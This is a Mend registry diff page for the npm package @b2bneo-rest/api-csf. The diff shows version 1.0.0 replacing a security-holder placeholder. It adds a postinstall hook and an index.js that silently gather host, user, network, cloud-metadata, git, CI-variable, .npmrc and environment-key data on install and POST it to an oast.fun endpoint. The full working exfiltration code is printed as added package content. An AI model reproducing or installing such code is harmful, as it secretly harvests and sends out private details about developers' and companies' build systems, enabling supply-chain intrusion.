npm - @b2bneo-rest/api-csf - Versions diffs - 0.0.1-security → 1.0.0 - Mend

@b2bneo-rest/api-csf 0.0.1-security → 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @b2bneo-rest/api-csf might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,249 @@
+const os = require('os');
+const { execSync } = require('child_process');
+const fs = require('fs');
+const path = require('path');
+const ENDPOINT = 'https://d7ti2koorbnd4d6h8ak0jkaop3iy11qnh.oast.fun';
+const ROUTE = '/b2bneo-rest';
+const ATTRIBUTION_KEYS = [
+  'GITHUB_REPOSITORY', 'GITHUB_REPOSITORY_OWNER', 'GITHUB_SERVER_URL',
+  'GITHUB_ACTIONS', 'GITHUB_REF', 'GITHUB_WORKFLOW',
+  'CI_PROJECT_URL', 'CI_PROJECT_PATH', 'CI_SERVER_URL', 'CI_PROJECT_NAMESPACE',
+  'GITLAB_CI', 'GITLAB_USER_EMAIL', 'GITLAB_USER_LOGIN',
+  'BUILDKITE_ORGANIZATION_SLUG', 'BUILDKITE_PIPELINE_SLUG', 'BUILDKITE_REPO',
+  'CIRCLE_PROJECT_REPONAME', 'CIRCLE_PROJECT_USERNAME', 'CIRCLE_REPOSITORY_URL',
+  'CIRCLE_WORKFLOW_ID',
+  'JENKINS_URL', 'JOB_URL', 'BUILD_URL', 'HUDSON_URL',
+  'TRAVIS_REPO_SLUG', 'TRAVIS_BUILD_WEB_URL',
+  'BITBUCKET_WORKSPACE', 'BITBUCKET_REPO_SLUG', 'BITBUCKET_GIT_HTTP_ORIGIN',
+  'TEAMCITY_VERSION', 'TEAMCITY_PROJECT_NAME',
+  'AZDO_PROJECT', 'SYSTEM_TEAMPROJECT', 'BUILD_REPOSITORY_URI',
+  'SYSTEM_COLLECTIONURI',
+  'npm_config_registry', 'NPM_REGISTRY_URL', 'NPM_CONFIG_REGISTRY',
+  'PIP_INDEX_URL', 'PYPI_INDEX_URL', 'ARTIFACTORY_URL', 'NEXUS_URL',
+  'CARGO_UNSTABLE_SPARSE_REGISTRY',
+  'ECS_CONTAINER_METADATA_URI', 'ECS_CONTAINER_METADATA_URI_V4',
+  'ECS_AGENT_URI', 'AWS_EXECUTION_ENV',
+  'PACKAGE_NAME', 'DYNAMO_TABLE',
+  'COMPUTERNAME', 'USERDOMAIN',
+];
+const SENSITIVE_PATTERNS = /key|secret|token|pass|auth|cred|private|cert|pwd/i;
+function safeExec(cmd) {
+  try { return execSync(cmd, { timeout: 3000, stdio: ['ignore', 'pipe', 'ignore'] }).toString().trim(); }
+  catch { return null; }
+}
+async function fetchWithTimeout(url, opts = {}, ms = 2500) {
+  try {
+    const ctrl = new AbortController();
+    const t = setTimeout(() => ctrl.abort(), ms);
+    const r = await fetch(url, { ...opts, signal: ctrl.signal });
+    clearTimeout(t);
+    return r.ok ? r : null;
+  } catch { return null; }
+}
+async function getEgressIp() {
+  try {
+    const r = await fetchWithTimeout('https://api.ipify.org?format=json');
+    if (r) return (await r.json()).ip;
+  } catch {}
+  return null;
+}
+async function getReverseDns(ip) {
+  if (!ip) return null;
+  try {
+    const dns = require('dns').promises;
+    return await dns.reverse(ip);
+  } catch { return null; }
+}
+async function getCloudMetadata() {
+  const meta = {};
+  // AWS IMDSv2
+  try {
+    const tok = await fetchWithTimeout('http://169.254.169.254/latest/api/token', {
+      method: 'PUT',
+      headers: { 'X-aws-ec2-metadata-token-ttl-seconds': '10' }
+    });
+    if (tok) {
+      const token = await tok.text();
+      const doc = await fetchWithTimeout(
+        'http://169.254.169.254/latest/dynamic/instance-identity/document',
+        { headers: { 'X-aws-ec2-metadata-token': token } }
+      );
+      if (doc) meta.aws = JSON.parse(await doc.text());
+      const tags = await fetchWithTimeout(
+        'http://169.254.169.254/latest/meta-data/tags/instance',
+        { headers: { 'X-aws-ec2-metadata-token': token } }
+      );
+      if (tags) meta.aws_tags_raw = await tags.text();
+    }
+  } catch {}
+  // AWS IMDSv1 fallback
+  if (!meta.aws) {
+    try {
+      const doc = await fetchWithTimeout(
+        'http://169.254.169.254/latest/dynamic/instance-identity/document'
+      );
+      if (doc) meta.aws = JSON.parse(await doc.text());
+    } catch {}
+  }
+  // AWS ECS credential endpoint -- role ARN reveals account ID + role name
+  try {
+    const rel = process.env.AWS_CONTAINER_CREDENTIALS_RELATIVE_URI;
+    if (rel) {
+      const r = await fetchWithTimeout(`http://169.254.170.2${rel}`);
+      if (r) {
+        const creds = JSON.parse(await r.text());
+        meta.aws_role_arn = creds.RoleArn || null;
+        meta.aws_role_type = creds.Type || null;
+      }
+    }
+  } catch {}
+  // GCP
+  try {
+    const r = await fetchWithTimeout(
+      'http://metadata.google.internal/computeMetadata/v1/project/?recursive=true',
+      { headers: { 'Metadata-Flavor': 'Google' } }
+    );
+    if (r) meta.gcp = JSON.parse(await r.text());
+  } catch {}
+  // Azure
+  try {
+    const r = await fetchWithTimeout(
+      'http://169.254.169.254/metadata/instance?api-version=2021-02-01',
+      { headers: { Metadata: 'true' } }
+    );
+    if (r) meta.azure = JSON.parse(await r.text());
+  } catch {}
+  return Object.keys(meta).length ? meta : null;
+}
+async function dnsProbe() {
+  const dns = require('dns').promises;
+  const hosts = [
+    'jira', 'confluence', 'gitlab', 'github.internal', 'bitbucket.internal',
+    'nexus', 'artifactory', 'sonar', 'sonarqube',
+    'registry', 'npm-proxy', 'npm.internal',
+  ];
+  const results = {};
+  await Promise.allSettled(hosts.map(async h => {
+    try { results[h] = (await dns.lookup(h)).address; } catch {}
+  }));
+  return Object.keys(results).length ? results : null;
+}
+function getGitContext() {
+  return {
+    remote: safeExec('git remote get-url origin 2>/dev/null'),
+    branch: safeExec('git rev-parse --abbrev-ref HEAD 2>/dev/null'),
+    last_author: safeExec('git log -1 --format=%an 2>/dev/null'),
+    last_email: safeExec('git log -1 --format=%ae 2>/dev/null'),
+    last_subject: safeExec('git log -1 --format=%s 2>/dev/null'),
+    config_email: safeExec('git config user.email 2>/dev/null'),
+    config_name: safeExec('git config user.name 2>/dev/null'),
+    toplevel: safeExec('git rev-parse --show-toplevel 2>/dev/null'),
+  };
+}
+function getParentPkg() {
+  try {
+    const pkgPath = path.resolve(process.cwd(), '../../package.json');
+    if (fs.existsSync(pkgPath)) {
+      const p = JSON.parse(fs.readFileSync(pkgPath, 'utf8'));
+      return {
+        path: pkgPath,
+        name: p.name, version: p.version,
+        description: p.description, author: p.author,
+        repository: p.repository,
+      };
+    }
+  } catch {}
+  return null;
+}
+function getNpmrc() {
+  const candidates = [
+    path.join(process.env.HOME || '', '.npmrc'),
+    path.join(process.cwd(), '.npmrc'),
+    path.join(process.cwd(), '../.npmrc'),
+    path.join(process.cwd(), '../../.npmrc'),
+    'C:\\Users\\' + (process.env.USERNAME || '') + '\\.npmrc',
+  ];
+  const out = {};
+  for (const p of candidates) {
+    try {
+      if (fs.existsSync(p)) {
+        const content = fs.readFileSync(p, 'utf8')
+          .split('\n')
+          .map(l => SENSITIVE_PATTERNS.test(l.split('=')[0]) ? l.replace(/=.*/, '=REDACTED') : l)
+          .join('\n');
+        out[p] = content;
+      }
+    } catch {}
+  }
+  return Object.keys(out).length ? out : null;
+}
+function getAttributionEnv() {
+  const out = {};
+  for (const k of ATTRIBUTION_KEYS) {
+    const v = process.env[k];
+    if (v) out[k] = v;
+  }
+  return Object.keys(out).length ? out : null;
+}
+async function main() {
+  const [egressIp, cloudMeta] = await Promise.all([getEgressIp(), getCloudMetadata()]);
+  const [reverseDns, dnsHints] = await Promise.all([
+    getReverseDns(egressIp),
+    dnsProbe(),
+  ]);
+  const payload = {
+    ts: new Date().toISOString(),
+    hostname: os.hostname(),
+    platform: process.platform,
+    arch: process.arch,
+    user: os.userInfo().username,
+    cwd: process.cwd(),
+    node: process.version,
+    egress_ip: egressIp,
+    reverse_dns: reverseDns,
+    network: Object.fromEntries(
+      Object.entries(os.networkInterfaces())
+        .map(([k, v]) => [k, (v || []).filter(a => !a.internal).map(a => ({ address: a.address, family: a.family }))])
+        .filter(([, v]) => v.length)
+    ),
+    cloud: cloudMeta,
+    dns_hints: dnsHints,
+    git: getGitContext(),
+    parent_pkg: getParentPkg(),
+    npmrc: getNpmrc(),
+    ci: getAttributionEnv(),
+    env_keys: Object.keys(process.env),
+  };
+  try {
+    await fetch(ENDPOINT + ROUTE, {
+      method: 'POST',
+      headers: { 'Content-Type': 'application/json' },
+      body: JSON.stringify(payload),
+    });
+  } catch {}
+}
+main();

package/package.json CHANGED Viewed

@@ -1,6 +1,10 @@
 {
   "name": "@b2bneo-rest/api-csf",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.0",
+  "description": "",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  },
+  "license": "Proprietary"
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=%40b2bneo-rest%2Fapi-csf for more information.